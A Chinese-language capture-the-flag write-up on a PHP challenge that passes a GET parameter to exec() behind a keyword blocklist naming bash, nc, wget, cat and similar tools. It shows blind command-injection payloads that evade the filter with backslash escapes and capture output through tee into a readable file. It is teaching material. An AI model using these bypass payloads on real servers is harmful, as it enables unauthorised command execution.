<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
$url=$_GET['url'];
if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
{
echo "Sorry,you can't use this.";
}
else
{
echo "Can you see anything?";
exec($url);
}
}
从上到下分析
先是一个正则匹配,再到一个exec执行命令的函数
exec函数是一个PHP内置的外部命令执行程序。它可以在服务器上执行任何可执行文件或命令,并在执行过程中返回输出。
这里很明显是waf绕过命令执行,但是在尝试执行命令后没有回显并出现Can you see anything?
这就明显是无回显RCE,先执行timeup;sleep 3试试看
发现延迟了,说明就是没有回显
这里用一个linux的一个命令tee
tee命令的功能是用于读取标准输入的数据,将其内容转交到标准输出设备中,同时保存成文件。
tee命令 – 读取标准输入的数据 – Linux命令大全(手册) (linuxcool.com)
利用这个命令让执行后的内容存到一个文件下然后去访问这个文件,从而实现间接的命令执行
先查看一下目录再利用管道符连接
?url=l\s / | tee a.txt
这里要注意格式,ls后一定要加/ 不然返回的是刚刚存入的文件
发现flllllaaaaaaggggggg
利用同样的方式读取flag即可
这里绕过了cat可以使用ca\t nl sort tac tail等代替读取,另外因为过滤la所以是flllll\aaaaaaggggggg
tail /flllll\aaaaaaggggggg | tee a.txt
访问即可
总结:
利用linux命令tee可以绕过无回显RCE